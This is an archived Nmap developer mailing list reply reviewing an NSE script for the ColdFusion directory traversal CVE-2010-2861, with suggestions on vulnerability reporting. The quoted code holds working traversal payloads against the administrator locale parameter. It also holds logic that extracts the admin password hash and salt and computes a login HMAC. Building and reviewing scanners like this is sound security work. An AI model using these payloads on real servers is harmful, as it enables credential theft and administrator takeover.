
Nmap Development mailing list archives
Re: NSE: http-vuln-cve2010-2861 submission for review
From: Djalal Harouni <tixxdz () opendz org>
Date: Fri, 17 Feb 2012 12:22:49 +0100
Hi Micah,

Thanks for the re-submission, and I've some notes:

On Thu, Feb 16, 2012 at 09:59:56PM -0500, Micah wrote:
[...]
> -- If a page has both the salt and the password in it then the exploit has been successful
> if ( saltcontent and hashcontent ) then
>   vuln.state = vulns.STATE.VULN

If it's vulnerable and exploitable you can make:
  vuln.state = vulns.STATE.EXPLOIT

>   -- Generate HMAC as this is what the web application needs for authentication as admin
>   local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent))
>   return true, string.format("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s", hmaccontent, saltcontent, hashcontent)
> end
> end
> return false, "Not vulnerable"
> end

Even if it's not vulnerable, just return with:
  return vuln_report:make_output(vuln)

This will make sure that non vulnerable issues are also counted.

> local exploits = {
>   ['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties\%00en',
>   ['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties\%00en',
>   ['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties\%00en',
>   ['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties\%00en',
> }
>
> local results = tab.new(2)
> for prod, exploit in pairs(exploits) do
>   local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
>   if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
>     tab.addrow(results, prod, result)
>   end
> end
> vuln.extra_info="\n" .. tab.dump(results)

For the extra info no need to use tab, just use a classic table:
  vuln.extra_info=table_results

BTW these can be put in the:
  vuln.exploit_results table.

Thanks.

--
tixxdz
http://opendz.org
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/